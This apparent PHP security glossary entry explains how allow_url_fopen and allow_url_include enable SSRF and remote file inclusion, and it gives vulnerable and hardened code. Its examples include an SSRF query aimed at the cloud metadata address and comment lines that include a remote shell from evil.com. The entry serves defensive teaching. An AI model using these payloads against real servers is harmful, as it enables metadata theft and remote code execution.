allow_url_fopen / allow_url_include
Also Known As
allow_url_fopen setting
remote file open
URL file wrapper
TL;DR
PHP INI settings that permit file functions and include/require to load remote URLs — a major SSRF and RFI enabler.
Explanation
allow_url_fopen permits file_get_contents(), fopen(), and similar functions to fetch remote HTTP/FTP URLs. allow_url_include goes further, enabling include() and require() to load remote scripts — enabling Remote File Inclusion (RFI) attacks where an attacker includes and executes a PHP file from an attacker-controlled server. Both settings should be disabled in production (allow_url_fopen = Off, allow_url_include = Off) unless remote fetching is explicitly required, in which case use cURL with strict URL validation instead.
Common Misconception
✗ Disabling allow_url_fopen prevents all remote HTTP requests from PHP. It only affects URL-aware file functions like file_get_contents() with a URL — cURL is completely unaffected and can still make outbound requests regardless of this setting.
Why It Matters
allow_url_fopen enables PHP's file functions to fetch remote URLs — combined with user-controlled paths, it enables SSRF and remote file inclusion vulnerabilities.
Common Mistakes
- Leaving allow_url_fopen enabled in production when it is only needed in specific scripts.
- Using file_get_contents($userInput) where user input can be a URL — SSRF via allow_url_fopen.
- Not realising that allow_url_fopen affects include/require when allow_url_include is also enabled.
- Believing that allow_url_fopen is safe because you only call it with known paths — input sanitisation can be bypassed.
Avoid When
- Any production web application — allow_url_fopen enables remote file inclusion vulnerabilities if user input reaches file functions.
- When Guzzle, cURL, or any HTTP client library is available — use them instead for explicit, safe HTTP calls.
- Shared hosting environments where you cannot control what other tenants do with the setting.
When To Use
- Strictly controlled CLI scripts on trusted infrastructure where input is never user-supplied.
- Legacy code that cannot yet be refactored — disable it in php.ini and enable only where truly required.
- Never use with user-supplied file paths — always use explicit HTTP client libraries for remote requests.
Code Examples
✗ Vulnerable
// allow_url_fopen=On in php.ini enables this SSRF:
$content = file_get_contents($_GET['source']);
// ?source=http://169.254.169.254/latest/meta-data/ — AWS metadata
✓ Fixed
; php.ini
allow_url_fopen = Off ; prevents file_get_contents('http://evil.com/shell.php')
allow_url_include = Off ; prevents include('http://evil.com/shell.php') — critical
// For HTTP requests, use GuzzleHTTP — explicit, configurable, auditable:
<?php
use GuzzleHttp\Client;
require 'vendor/autoload.php';
$client = new Client(['timeout' => 5, 'verify' => true]);
$response = $client->get('https://api.example.com/data');
$body = (string) $response->getBody();
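A guarded fetch that puts the entry's advice into working code: scheme and host allowlist checks, a resolved-address check that rejects link-local and private ranges such as the metadata address shown above, and an explicit cURL call with timeouts, TLS verification and no redirect following. This is an added example, not the entry's own code; ALLOWED_HOSTS and api.example.com are assumed values.

```php
<?php
// Added example, not the entry's own code: a guarded replacement for
// file_get_contents($userUrl). ALLOWED_HOSTS is an assumed allowlist.
const ALLOWED_HOSTS = ['api.example.com'];
function isPublicIp(string $ip): bool
{
    // Rejects RFC 1918/ULA private ranges and reserved ones, incl. 127/8 and 169.254/16 (cloud metadata).
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}
function validateOutboundUrl(string $url): string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('Malformed URL');
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        throw new InvalidArgumentException('Only http/https are allowed');
    }
    $host = strtolower($p['host']);
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        throw new InvalidArgumentException('Host not in allowlist');
    }
    // Defence in depth: every A/AAAA answer must be public. DNS can still change
    // before cURL resolves it again, so the allowlist remains the primary control.
    foreach (dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $rec) {
        if (!isPublicIp($rec['ip'] ?? $rec['ipv6'] ?? '')) {
            throw new InvalidArgumentException('Host resolves to a non-public address');
        }
    }
    return $url;
}
function fetchRemote(string $url): string
{
    $ch = curl_init(validateOutboundUrl($url));
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false, // a redirect could point at an internal host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 3,     // explicit timeouts, unlike a bare file wrapper fetch
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('Fetch failed: ' . curl_error($ch));
    }
    return $body;
}
```

Calling validateOutboundUrl('http://169.254.169.254/latest/meta-data/') throws at the allowlist check before any connection is attempted, which is the behaviour the vulnerable snippet above lacks.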
Added
15 Mar 2026
Edited
25 Mar 2026
Tools & Severity
🟠 High
⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_fopen=Off in production php.ini — use cURL explicitly instead, which gives you full control over timeouts, TLS verification, and redirect following
📦 Applies To
PHP 5.0+
web
cli
🔍 Detection Hints
allow_url_fopen=On in production; file_get_contents('http://...') for external requests; no timeout on URL fetch via file wrappers
Auto-detectable:
✓ Yes
semgrep
lynis
🤖 AI Agent
Confidence: High
False Positives: Low
✓ Auto-fixable
Fix: Low
Context: Line
CWE-441
CWE-918